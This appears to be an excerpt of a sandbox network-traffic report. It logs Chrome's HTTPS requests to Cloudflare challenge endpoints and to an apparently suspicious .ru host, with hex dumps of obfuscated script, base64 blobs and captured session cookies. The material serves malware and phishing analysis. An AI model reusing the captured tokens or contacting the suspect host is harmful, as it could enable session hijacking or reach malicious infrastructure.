                                                2024-05-30 10:20:46 UTC1369INData Raw: 7a 28 31 36 36 32 29 5d 3d 69 7a 28 39 33 30 29 2c 66 5a 5b 69 7a 28 32 35 38 39 29 5d 3d 69 7a 28 33 33 30 36 29 2c 66 5a 5b 69 7a 28 32 30 36 37 29 5d 3d 69 7a 28 31 32 32 36 29 2c 66 5a 5b 69 7a 28 32 34 35 39 29 5d 3d 69 7a 28 31 31 30 33 29 2c 66 5a 5b 69 7a 28 31 30 39 35 29 5d 3d 69 7a 28 32 36 39 30 29 2c 66 5a 5b 69 7a 28 31 30 37 34 29 5d 3d 69 7a 28 33 32 30 36 29 2c 66 5a 5b 69 7a 28 32 31 38 38 29 5d 3d 69 7a 28 32 35 34 31 29 2c 66 5a 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 37 36 32 29 2c 66 5a 5b 69 7a 28 33 36 34 29 5d 3d 69 7a 28 32 33 37 39 29 2c 66 5a 5b 69 7a 28 31 34 35 38 29 5d 3d 69 7a 28 34 30 31 29 2c 66 5a 5b 69 7a 28 31 31 39 37 29 5d 3d 69 7a 28 33 30 33 34 29 2c 66 5a 5b 69 7a 28 32 37 36 36 29 5d 3d 69 7a 28 31 30 36 32 29 2c
                                                Data Ascii: z(1662)]=iz(930),fZ[iz(2589)]=iz(3306),fZ[iz(2067)]=iz(1226),fZ[iz(2459)]=iz(1103),fZ[iz(1095)]=iz(2690),fZ[iz(1074)]=iz(3206),fZ[iz(2188)]=iz(2541),fZ[iz(842)]=iz(762),fZ[iz(364)]=iz(2379),fZ[iz(1458)]=iz(401),fZ[iz(1197)]=iz(3034),fZ[iz(2766)]=iz(1062),
                                                2024-05-30 10:20:46 UTC1369INData Raw: 7a 28 37 30 38 29 5d 3d 69 7a 28 37 37 31 29 2c 67 31 5b 69 7a 28 31 37 38 33 29 5d 3d 69 7a 28 32 34 36 31 29 2c 67 31 5b 69 7a 28 31 38 31 33 29 5d 3d 69 7a 28 31 37 30 33 29 2c 67 31 5b 69 7a 28 31 31 30 35 29 5d 3d 69 7a 28 31 33 39 30 29 2c 67 31 5b 69 7a 28 32 39 36 34 29 5d 3d 69 7a 28 31 38 37 36 29 2c 67 31 5b 69 7a 28 31 38 34 31 29 5d 3d 69 7a 28 33 30 36 37 29 2c 67 31 5b 69 7a 28 32 37 36 33 29 5d 3d 69 7a 28 32 37 39 39 29 2c 67 31 5b 69 7a 28 33 31 31 30 29 5d 3d 69 7a 28 31 35 30 36 29 2c 67 31 5b 69 7a 28 36 38 39 29 5d 3d 69 7a 28 31 37 30 34 29 2c 67 31 5b 69 7a 28 33 32 39 29 5d 3d 69 7a 28 39 36 35 29 2c 67 31 5b 69 7a 28 32 38 32 32 29 5d 3d 69 7a 28 31 33 33 34 29 2c 67 31 5b 69 7a 28 39 33 37 29 5d 3d 69 7a 28 33 31 36 37 29 2c 67
                                                Data Ascii: z(708)]=iz(771),g1[iz(1783)]=iz(2461),g1[iz(1813)]=iz(1703),g1[iz(1105)]=iz(1390),g1[iz(2964)]=iz(1876),g1[iz(1841)]=iz(3067),g1[iz(2763)]=iz(2799),g1[iz(3110)]=iz(1506),g1[iz(689)]=iz(1704),g1[iz(329)]=iz(965),g1[iz(2822)]=iz(1334),g1[iz(937)]=iz(3167),g
                                                2024-05-30 10:20:46 UTC1369INData Raw: 37 38 36 29 2c 67 32 5b 69 7a 28 38 34 32 29 5d 3d 69 7a 28 35 30 39 29 2c 67 32 5b 69 7a 28 33 36 34 29 5d 3d 69 7a 28 39 32 38 29 2c 67 32 5b 69 7a 28 31 34 35 38 29 5d 3d 69 7a 28 31 36 39 33 29 2c 67 32 5b 69 7a 28 31 31 39 37 29 5d 3d 69 7a 28 36 30 31 29 2c 67 32 5b 69 7a 28 32 37 36 36 29 5d 3d 69 7a 28 37 35 34 29 2c 67 32 5b 69 7a 28 32 36 31 31 29 5d 3d 69 7a 28 31 32 31 38 29 2c 67 32 5b 69 7a 28 31 33 36 36 29 5d 3d 69 7a 28 31 32 31 30 29 2c 67 33 3d 7b 7d 2c 67 33 5b 69 7a 28 32 34 31 37 29 5d 3d 69 7a 28 32 30 38 33 29 2c 67 33 5b 69 7a 28 31 30 35 32 29 5d 3d 69 7a 28 32 38 33 33 29 2c 67 33 5b 69 7a 28 32 35 35 32 29 5d 3d 69 7a 28 33 32 35 30 29 2c 67 33 5b 69 7a 28 31 34 38 33 29 5d 3d 69 7a 28 31 37 35 30 29 2c 67 33 5b 69 7a 28 32 39
                                                Data Ascii: 786),g2[iz(842)]=iz(509),g2[iz(364)]=iz(928),g2[iz(1458)]=iz(1693),g2[iz(1197)]=iz(601),g2[iz(2766)]=iz(754),g2[iz(2611)]=iz(1218),g2[iz(1366)]=iz(1210),g3={},g3[iz(2417)]=iz(2083),g3[iz(1052)]=iz(2833),g3[iz(2552)]=iz(3250),g3[iz(1483)]=iz(1750),g3[iz(29
                                                2024-05-30 10:20:46 UTC1369INData Raw: 39 37 37 29 2c 67 34 5b 69 7a 28 33 31 31 30 29 5d 3d 69 7a 28 31 34 35 31 29 2c 67 34 5b 69 7a 28 36 38 39 29 5d 3d 69 7a 28 39 31 39 29 2c 67 34 5b 69 7a 28 33 32 39 29 5d 3d 69 7a 28 31 37 39 31 29 2c 67 34 5b 69 7a 28 32 38 32 32 29 5d 3d 69 7a 28 38 35 35 29 2c 67 34 5b 69 7a 28 39 33 37 29 5d 3d 69 7a 28 32 34 36 34 29 2c 67 34 5b 69 7a 28 31 32 38 38 29 5d 3d 69 7a 28 32 35 35 38 29 2c 67 34 5b 69 7a 28 32 30 34 39 29 5d 3d 69 7a 28 39 30 38 29 2c 67 34 5b 69 7a 28 31 32 35 35 29 5d 3d 69 7a 28 33 32 39 37 29 2c 67 34 5b 69 7a 28 32 31 33 38 29 5d 3d 69 7a 28 31 30 32 32 29 2c 67 34 5b 69 7a 28 32 33 32 32 29 5d 3d 69 7a 28 32 34 31 31 29 2c 67 34 5b 69 7a 28 31 36 36 32 29 5d 3d 69 7a 28 32 38 32 30 29 2c 67 34 5b 69 7a 28 32 35 38 39 29 5d 3d 69
                                                Data Ascii: 977),g4[iz(3110)]=iz(1451),g4[iz(689)]=iz(919),g4[iz(329)]=iz(1791),g4[iz(2822)]=iz(855),g4[iz(937)]=iz(2464),g4[iz(1288)]=iz(2558),g4[iz(2049)]=iz(908),g4[iz(1255)]=iz(3297),g4[iz(2138)]=iz(1022),g4[iz(2322)]=iz(2411),g4[iz(1662)]=iz(2820),g4[iz(2589)]=i


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.449752104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:46 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:46 UTC240INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:46 GMT
                                                Content-Type: image/png
                                                Content-Length: 61
                                                Connection: close
                                                cache-control: max-age=2629800, public
                                                Server: cloudflare
                                                CF-RAY: 88bdfe564d5b19fb-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:46 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.449743188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:46 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/hIzc6w/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6Ik11Z0FaT29QLzNyb3R2OFhaek5PaXc9PSIsInZhbHVlIjoidmZyeXN3T29GQi9PR2NVeGlUc0I1MDgrZTdOcHhsVDg2ZVdWQWxEMWRMTXVFUDhzZ01HbVNEa3M5YVJ2SFhLSGowSVl5ZVJKaFl2WEZjbnU5S1JTQlFEWWVpR3dUcjAxb3hsTFIwVnR4NktsTEZ3QXdySVVRaDRnaW9IREFVZEciLCJtYWMiOiJlYmEwNDA3ZTA5MWMzNDkyOWU4NzJjNjAwYzc0Y2E5MjcwYzNkYWJjMTM0NzhlODJkOTQxM2FiNWUzMzI0ZjIzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImJjemp5S1NUVmtQZ1lnVlcyMWxaQ0E9PSIsInZhbHVlIjoiL09WM1BCbjgwS2lSRmxzaDQ2ZmR0R0RxSVZveFBMZEhhQmovTWcyUGx0K29hQnN3RmlGUUJZRnNHc0h4bS9qeEFtTzd5OXlCVDNTek90RGxYalUweldNOWp1WWdFTjNBS1ZZS1dVendlQ2tRSFZrZWNCR2Zud3Q3VE1xZWkzLzUiLCJtYWMiOiI2ZjdiYzFhZWY0MmZkYmFiZjM0ODVkZGU5NmI4N2U1NjIwMjc4NDkzNjc5NmJlY2Y2MzI0Mjc3MTEyODViY2JiIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:20:47 UTC635INHTTP/1.1 404 Not Found
                                                Date: Thu, 30 May 2024 10:20:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=14400
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IFfxEEvmd4bgv1rf9R0SUQesSlcBsdnMk0vaO8wl5VeKSAuB5bzqxCTNm4sZUsQA%2BYcYdivYdOBNPTUy3frQDVrngNbzCKpSy9qujj1nqbMQS9IrRLh7TvVAhmnExg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                alt-svc: h3=":443"; ma=86400
                                                CF-Cache-Status: HIT
                                                Age: 4449
                                                Server: cloudflare
                                                CF-RAY: 88bdfe598bdf43f4-EWR
                                                2024-05-30 10:20:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.449753104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:46 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:47 UTC240INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:47 GMT
                                                Content-Type: image/png
                                                Content-Length: 61
                                                Connection: close
                                                cache-control: max-age=2629800, public
                                                Server: cloudflare
                                                CF-RAY: 88bdfe5a0cac4243-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:47 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.449754104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:47 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 2663
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Content-type: application/x-www-form-urlencoded
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                CF-Challenge: f67bea3da7e6db1
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://challenges.cloudflare.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:47 UTC2663OUTData Raw: 76 5f 38 38 62 64 66 65 35 31 32 65 35 64 34 33 30 31 3d 64 63 4a 61 32 61 37 6f 6b 36 55 77 4a 41 63 43 54 65 6b 47 6b 58 6b 74 61 43 39 61 42 37 56 6a 77 43 6b 6e 6c 4d 6b 64 56 41 70 6b 57 6e 6b 6a 4c 66 6b 41 38 76 55 39 6b 45 61 6c 57 42 43 55 64 6b 45 4a 55 25 32 62 6b 73 4a 55 47 7a 61 54 38 51 6b 6c 42 6c 6b 4e 6b 4d 4a 37 39 53 6b 6b 2b 4c 6b 49 61 45 65 6b 7a 61 41 6c 6b 35 77 30 67 4c 6b 5a 61 45 77 6e 6f 41 75 6b 43 70 24 6b 7a 67 30 34 6b 76 34 74 4c 7a 68 6b 36 68 38 2d 75 6b 43 6c 6b 46 6c 54 56 49 6c 6a 53 38 54 55 68 6b 55 4a 53 6c 4a 56 4a 43 47 43 6b 4c 61 45 36 6b 6a 34 6b 54 61 41 53 7a 61 53 61 67 6b 41 48 4f 64 61 2b 46 68 2d 4a 65 35 34 44 6b 77 56 37 68 79 24 48 6b 55 76 38 2d 68 4a 47 39 42 7a 6a 6d 65 62 64 6a 73 2d 48 6f 6b 55
                                                Data Ascii: v_88bdfe512e5d4301=dcJa2a7ok6UwJAcCTekGkXktaC9aB7VjwCknlMkdVApkWnkjLfkA8vU9kEalWBCUdkEJU%2bksJUGzaT8QklBlkNkMJ79Skk+LkIaEekzaAlk5w0gLkZaEwnoAukCp$kzg04kv4tLzhk6h8-ukClkFlTVIljS8TUhkUJSlJVJCGCkLaE6kj4kTaASzaSagkAHOda+Fh-Je54DkwV7hy$HkUv8-hJG9Bzjmebdjs-HokU
                                                2024-05-30 10:20:47 UTC731INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:47 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 120924
                                                Connection: close
                                                cf-chl-gen: ypYcgfPhcxTbW5pjp6Tzhx5bbe9BLPPus6NBgXs0g/qy5A0aOblrD5K9VGz1+ucomsuRd7QuQOfrNs+MTwi73kF7IWn8HRZWJ/XfH8Dcw8Ay9re89bo46QXd22BU6bndzTcXO43SL3CWD0a6BLmX31aZvljhBhVkLk6vm6hWRayg8kd+5zHkO1RMD3rTvOsJ605vO01dFaHwm2f7yDuxQ14GHHlZ0ZmF9yeVQgfo8o5jKklwu2qD5JTsQR3Ej+CGSzD+5ReHSYvDgvoXT31D05wHphM/OypPgSd0DQT/8xaDiD8mN1itmvtVGuLrvANYdDIPOauVSnHmtPgLYw+Vm4HZghQFx5qqf0G7SB4/sZVvBkMcuUkxYIGj9H0lNgtp/GZ8hYGBYq//JYpKcV+w+P+8RdvT8wTlkbN8rBZaXs/KsTpXNSKybW6PnIgRZba4J7k6f31zaELhlKkI8hAq8g==$tuGgrxWUPmNAu82MeIHeaw==
                                                Server: cloudflare
                                                CF-RAY: 88bdfe5d3a6d8c9b-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:47 UTC638INData Raw: 77 61 53 61 6d 61 4f 31 6f 34 6e 4a 78 38 75 63 70 61 36 55 7a 39 54 54 74 4c 66 63 6e 4d 57 51 6e 4e 7a 69 33 36 43 64 33 4f 44 50 33 4c 4b 6e 77 73 62 6d 36 61 32 69 37 4f 2f 63 36 62 57 76 34 74 4f 30 38 72 6d 75 73 2f 66 76 38 38 47 2b 37 74 54 64 78 64 6b 47 33 41 6a 4a 33 41 62 73 41 2b 38 4b 38 41 66 51 33 51 2f 58 37 73 2f 56 2f 42 4d 57 38 77 45 58 47 76 30 58 33 51 34 46 46 4f 4c 6f 49 2b 72 65 34 79 67 62 4a 79 59 4d 4a 67 55 74 37 41 6f 32 4a 7a 6a 34 47 2b 38 54 4c 66 77 4b 4f 2f 78 42 2b 30 45 35 51 42 4d 42 4b 77 6b 6f 4c 30 49 6f 4b 53 6b 74 52 7a 4d 75 4f 43 63 71 50 42 70 54 48 54 68 41 51 44 59 74 51 46 78 69 5a 47 4d 67 4a 6b 70 4a 58 32 46 44 54 58 41 79 54 6c 46 41 62 57 38 78 55 7a 68 54 57 46 74 4c 67 45 31 55 54 32 74 78 58 59 47
                                                Data Ascii: waSamaO1o4nJx8ucpa6Uz9TTtLfcnMWQnNzi36Cd3ODP3LKnwsbm6a2i7O/c6bWv4tO08rmus/fv88G+7tTdxdkG3AjJ3AbsA+8K8AfQ3Q/X7s/V/BMW8wEXGv0X3Q4FFOLoI+re4ygbJyYMJgUt7Ao2Jzj4G+8TLfwKO/xB+0E5QBMBKwkoL0IoKSktRzMuOCcqPBpTHThAQDYtQFxiZGMgJkpJX2FDTXAyTlFAbW8xUzhTWFtLgE1UT2txXYG
                                                2024-05-30 10:20:47 UTC1369INData Raw: 36 6c 61 57 57 6a 68 35 35 39 6f 71 69 6b 71 47 57 4d 6e 6f 56 32 73 48 53 49 6b 4c 64 37 63 49 32 64 74 4c 47 51 73 4a 6d 6a 76 35 53 37 6e 63 66 47 76 4c 6d 63 79 73 79 4c 73 39 53 6a 6e 74 4f 71 6b 64 54 56 74 4b 2f 48 6d 4a 4b 33 72 36 47 76 34 71 58 59 73 63 62 41 71 72 37 72 36 62 66 4a 38 71 2f 67 71 76 43 73 77 66 50 31 34 39 76 48 78 76 6e 4d 32 4c 50 50 38 39 33 6c 7a 67 59 42 31 2b 6b 41 41 2f 77 45 37 63 6e 64 36 2b 2f 79 43 68 44 34 38 67 37 58 7a 52 54 33 2b 64 2f 2b 2f 50 6a 69 4a 50 30 59 42 4f 54 2b 41 79 62 2b 41 67 6b 71 41 77 66 38 4c 67 63 4b 4e 7a 49 4c 45 53 73 32 44 78 59 4a 4f 68 4d 59 4d 7a 34 58 48 52 46 43 47 79 4d 37 52 68 38 6e 4b 55 6f 6a 4b 31 4e 4f 4a 79 35 48 55 69 73 79 51 79 70 56 4a 6a 42 63 4d 32 45 73 4e 53 56 55 4a
                                                Data Ascii: 6laWWjh559oqikqGWMnoV2sHSIkLd7cI2dtLGQsJmjv5S7ncfGvLmcysyLs9SjntOqkdTVtK/HmJK3r6Gv4qXYscbAqr7r6bfJ8q/gqvCswfP149vHxvnM2LPP893lzgYB1+kAA/wE7cnd6+/yChD48g7XzRT3+d/+/PjiJP0YBOT+Ayb+AgkqAwf8LgcKNzILESs2DxYJOhMYMz4XHRFCGyM7Rh8nKUojK1NOJy5HUisyQypVJjBcM2EsNSVUJ
                                                2024-05-30 10:20:47 UTC1369INData Raw: 5a 68 71 69 51 6e 59 71 75 62 4a 4f 75 6b 49 4e 31 64 6f 70 7a 71 37 79 2f 72 71 4b 51 67 70 43 38 71 48 71 31 68 48 32 61 75 36 65 71 79 49 71 38 79 73 36 6e 72 38 75 67 71 64 75 70 6a 74 79 72 75 74 6a 69 6f 5a 37 4d 78 4e 71 6e 6f 70 76 5a 74 71 4b 6e 37 63 66 51 76 62 76 54 76 4b 75 6f 37 4f 6a 57 31 2b 69 36 38 66 50 4d 36 4f 37 66 31 65 37 75 39 65 59 47 33 39 6e 72 77 2b 54 5a 2f 63 67 4e 36 42 58 72 46 77 59 50 41 77 50 54 46 76 50 57 48 4f 72 62 32 78 77 64 44 78 34 65 48 64 34 49 48 75 63 71 46 68 34 48 37 75 6f 77 4c 51 41 75 4d 6a 6b 32 39 66 59 64 2b 69 72 36 49 66 77 76 2f 51 34 69 4f 52 59 2f 2f 6a 30 62 51 79 30 2b 52 6a 67 75 50 77 38 75 4d 6b 51 6e 56 77 39 4e 4c 45 51 36 56 32 41 74 47 6a 63 75 56 68 31 41 4e 56 30 70 48 46 70 4a 57 54
                                                Data Ascii: ZhqiQnYqubJOukIN1dopzq7y/rqKQgpC8qHq1hH2au6eqyIq8ys6nr8ugqdupjtyrutjioZ7MxNqnopvZtqKn7cfQvbvTvKuo7OjW1+i68fPM6O7f1e7u9eYG39nrw+TZ/cgN6BXrFwYPAwPTFvPWHOrb2xwdDx4eHd4IHucqFh4H7uowLQAuMjk29fYd+ir6Ifwv/Q4iORY//j0bQy0+RjguPw8uMkQnVw9NLEQ6V2AtGjcuVh1ANV0pHFpJWT
                                                2024-05-30 10:20:47 UTC1369INData Raw: 68 49 42 32 63 62 57 50 68 58 6d 35 75 4d 43 57 65 49 71 50 6c 38 47 4f 6f 6f 43 63 77 38 4b 32 78 73 43 46 71 62 4b 68 6f 37 47 78 7a 64 66 56 30 63 71 6a 76 62 4b 5a 72 62 4f 33 71 72 36 63 75 62 6e 65 30 75 4c 64 74 73 58 4f 76 62 2f 4e 7a 65 6e 7a 38 65 33 33 34 74 54 57 31 38 58 46 37 51 44 74 7a 4d 48 64 31 63 48 6b 32 4d 50 64 77 4f 6a 6b 44 64 72 72 34 66 6f 4c 30 4f 38 4e 38 67 6f 44 34 50 66 6e 2b 65 55 4f 49 41 37 73 34 66 33 78 34 51 58 34 34 2f 37 67 43 51 55 74 2b 67 77 43 47 79 76 77 43 44 4d 4d 45 69 73 58 45 42 73 33 47 78 67 63 44 52 6b 63 4e 50 55 4f 4e 67 42 42 4e 51 6a 38 50 30 77 73 52 44 45 4a 4d 53 55 4c 4c 41 67 30 54 30 5a 44 46 55 55 61 46 42 56 53 50 53 38 37 48 30 45 78 50 30 42 6d 50 32 41 34 62 45 52 4b 57 46 39 4c 54 6c 4e
                                                Data Ascii: hIB2cbWPhXm5uMCWeIqPl8GOooCcw8K2xsCFqbKho7GxzdfV0cqjvbKZrbO3qr6cubne0uLdtsXOvb/Nzenz8e334tTW18XF7QDtzMHd1cHk2MPdwOjkDdrr4foL0O8N8goD4Pfn+eUOIA7s4f3x4QX44/7gCQUt+gwCGyvwCDMMEisXEBs3GxgcDRkcNPUONgBBNQj8P0wsRDEJMSULLAg0T0ZDFUUaFBVSPS87H0ExP0BmP2A4bERKWF9LTlN
                                                2024-05-30 10:20:47 UTC1369INData Raw: 47 35 38 72 61 32 57 65 49 79 2f 68 4d 52 38 6f 4c 53 31 76 63 66 49 71 4d 6d 63 76 37 48 42 72 4b 37 4b 70 4a 4b 77 71 4b 7a 54 76 5a 50 65 33 64 65 76 77 71 37 4d 78 4e 36 6a 77 4b 4f 38 34 38 32 66 79 2b 62 63 32 71 7a 50 76 4b 37 68 36 64 62 47 73 50 48 51 79 4c 37 4d 38 75 76 62 34 4e 37 36 2f 72 6b 44 33 4e 51 43 37 65 49 42 41 2b 37 39 2b 67 62 6e 36 51 59 42 47 65 59 5a 47 66 54 77 38 64 6e 76 45 66 37 66 34 51 54 6a 34 77 44 6a 2f 43 41 4f 39 51 54 68 4d 75 4d 47 48 50 45 57 4a 69 77 54 41 76 6b 30 43 79 59 39 4e 77 34 55 51 54 73 55 47 45 55 2f 45 78 78 4a 51 78 5a 45 4e 30 59 5a 52 67 35 4e 49 53 4a 4d 45 53 52 61 56 56 6f 39 4c 42 6f 38 50 69 34 68 4c 46 41 64 47 53 68 55 49 52 31 6a 57 43 55 68 62 31 77 70 4a 57 39 67 4c 53 31 56 5a 44 45 78
                                                Data Ascii: G58ra2WeIy/hMR8oLS1vcfIqMmcv7HBrK7KpJKwqKzTvZPe3devwq7MxN6jwKO8482fy+bc2qzPvK7h6dbGsPHQyL7M8uvb4N76/rkD3NQC7eIBA+79+gbn6QYBGeYZGfTw8dnvEf7f4QTj4wDj/CAO9QThMuMGHPEWJiwTAvk0CyY9Nw4UQTsUGEU/ExxJQxZEN0YZRg5NISJMESRaVVo9LBo8Pi4hLFAdGShUIR1jWCUhb1wpJW9gLS1VZDEx
                                                2024-05-30 10:20:47 UTC1369INData Raw: 58 44 77 4b 44 42 6c 4c 69 70 75 61 43 6d 77 70 79 4b 71 4b 43 6b 79 37 57 4c 31 74 58 50 70 37 71 6d 78 4c 7a 57 6d 37 69 62 74 4e 76 46 6c 38 50 65 31 4e 4b 6a 36 4e 69 72 70 4c 66 4a 72 74 76 30 7a 64 62 46 77 39 58 56 38 62 6a 35 2b 4e 72 48 34 63 2f 66 35 4f 50 62 2b 41 66 66 41 75 49 47 44 64 6f 4d 33 2b 2f 62 30 74 73 50 45 77 48 6e 47 76 51 51 45 77 59 58 45 64 55 4c 47 67 51 57 37 4e 2f 6b 2f 75 4d 6c 4a 43 4d 64 2b 78 41 41 2b 7a 49 70 46 53 34 41 4b 52 51 79 42 43 30 6d 4e 67 67 78 45 44 6f 4d 4e 52 49 30 50 6a 55 53 4d 6a 70 46 4a 43 63 37 4c 79 63 6a 55 79 49 6f 52 6b 4d 76 45 44 52 45 4d 42 59 34 48 42 46 64 46 78 52 52 4d 46 56 5a 49 6c 74 42 50 54 34 6d 4f 47 70 66 4c 43 35 51 55 45 64 41 64 6d 31 4a 63 6b 52 74 53 6d 78 32 62 55 70 71 63
                                                Data Ascii: XDwKDBlLipuaCmwpyKqKCky7WL1tXPp7qmxLzWm7ibtNvFl8Pe1NKj6NirpLfJrtv0zdbFw9XV8bj5+NrH4c/f5OPb+AffAuIGDdoM3+/b0tsPEwHnGvQQEwYXEdULGgQW7N/k/uMlJCMd+xAA+zIpFS4AKRQyBC0mNggxEDoMNRI0PjUSMjpFJCc7LycjUyIoRkMvEDREMBY4HBFdFxRRMFVZIltBPT4mOGpfLC5QUEdAdm1JckRtSmx2bUpqc
                                                2024-05-30 10:20:47 UTC1369INData Raw: 35 78 4b 4f 6d 75 71 36 6d 6f 74 4b 6c 7a 6f 72 45 7a 4b 61 69 70 39 71 61 31 4a 53 61 6c 61 7a 56 7a 35 7a 4f 33 63 66 5a 73 4d 66 64 35 75 6e 5a 78 65 6e 4f 6f 2b 2b 70 72 38 48 4e 38 4c 58 45 77 72 62 55 39 66 6e 30 2f 63 71 38 2b 39 7a 79 76 72 6e 6b 2f 64 76 56 36 76 76 64 7a 2b 73 44 38 74 33 78 42 67 7a 4a 39 41 30 53 2b 50 66 36 37 76 44 64 46 50 4d 51 2b 51 4d 47 4a 41 63 57 49 4f 76 6e 49 50 30 6e 37 53 4d 44 38 41 30 53 38 51 6b 4d 4a 76 49 34 44 69 6b 63 39 76 34 61 48 7a 59 45 49 43 63 33 4a 54 6f 59 4e 78 55 6d 48 43 70 4f 4a 30 67 77 44 53 77 79 53 55 6b 6f 50 43 77 6f 58 6c 56 4c 57 69 78 56 4e 46 34 77 57 54 5a 59 59 6c 6b 32 56 6c 35 70 53 45 74 66 55 30 74 48 64 30 6c 68 63 6a 4a 58 57 6c 68 53 55 44 70 63 51 44 73 2b 59 45 4e 36 51 6d
